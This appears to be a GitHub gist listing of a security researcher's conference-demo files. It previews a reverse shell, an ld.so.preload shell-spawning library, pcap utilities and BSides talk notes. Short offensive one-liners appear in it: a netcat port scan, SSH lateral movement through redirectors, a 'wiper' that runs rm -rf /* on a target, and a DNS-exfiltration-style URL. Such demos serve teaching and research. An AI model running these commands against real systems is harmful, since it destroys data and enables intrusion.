- Slides
- Video
Stuart McMurray:
Stuart magisterquis
magisterquis
/ demoshell.go
Last active
December 30, 2024 23:16
Beaconing shell, useful for demos. Catch it with netcat.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // demoshell is a nifty beaconing shell useful for demos | |
| package main | |
| /* | |
| * demoshell.go | |
| * Simple reverse shell used in demos | |
| * By J. Stuart McMurray | |
| * Created 20180331 | |
| * Last Modified 20180331 | |
| */ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Port Scanning | |
| for p in `jot 65535`; do | |
| nc -vz TARGET $p | |
| done 2>&1 | tee portscan.out | |
| #Lateral Movement | |
| ssh -J REDIR1,REDIR2,REDIR3,REDIR4 user@TARGET | |
| #Wiper | |
| ssh TARGET rm -rf /* |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://dns.google.com/resolve?type=A&name=5468697320697320612074657374.example.com |
magisterquis
/ evershell.c
Created
February 10, 2019 03:10
Evershell, a little library that gets loaded by ld.so.preload.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * evershell.c | |
| * Little library to spawn a shell | |
| * By J. Stuart McMurray | |
| * Created 20190109 | |
| * Last Modified 20190109 | |
| */ | |
| #include <sys/socket.h> | |
| #include <sys/wait.h> |
magisterquis
/ pcaphelloworld.c
Last active
November 21, 2022 21:26
Hello, World! using pcap_inject.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * pcaphelloworld.c | |
| * Simple libpcap program | |
| * By J. Stuart McMurray | |
| * Created 20190527 | |
| * Last Modified 20190527 | |
| */ | |
| #include <arpa/inet.h> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Slides: https://docs.google.com/presentation/d/12dtJwSHpJwMyhCj0-lr8wVHsBCywep3oXtPm50YXHqE/edit?usp=sharing | |
| Packet Checksummer: https://github.com/magisterquis/packetchecksum | |
| Compiling and Running | |
| Source: https://gist.github.com/magisterquis/e98038e833543dcb59173d813d7c35d8 | |
| Asciicast: https://asciinema.org/a/248683 | |
| TelnetWatcher | |
| Source: https://github.com/magisterquis/telnetwatcher | |
| Asciicast: https://asciinema.org/a/248709 | |
| PcapKnock | |
| Source: https://github.com/magisterquis/pcapknock |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "encoding/base64" | |
| "fmt" | |
| "io/ioutil" | |
| "log" | |
| "net/http" | |
| "os" |
magisterquis
/ tapup.c
Last active
September 11, 2019 17:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * tapup.c | |
| * Bring up a tap device and discard frames | |
| * By J. Stuart McMurray | |
| * Created 20190911 | |
| * Last Modified 20190911 | |
| */ | |
| #include <linux/if.h> | |
| #include <linux/if_tun.h> |
magisterquis
/ notes
Last active
October 12, 2019 14:23
Notes and links for "Unix Admins, Go H4x0r!" demo, BSides Puerto Rico 2019
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Link to the slides: https://docs.google.com/presentation/d/1D5_68h5EgEYCRDh_gpVRUc22xazUf5s0u7wBK_C8zkQ | |
| Speakers' twitter handles: @fin_ack (Fernando) | |
| @magisterquis (Stuart) | |
| Commands executed during the demo: | |
| ssh -v [email protected] | |
| ps awwwfux | |
| egrep -A1 '^[sudo]{4}' .*history | |
| sudo -l |
magisterquis
/ bsidesdc2019.md
Last active
April 10, 2022 17:03
— forked from CS-5/bsidesdc2019.md
OlderNewer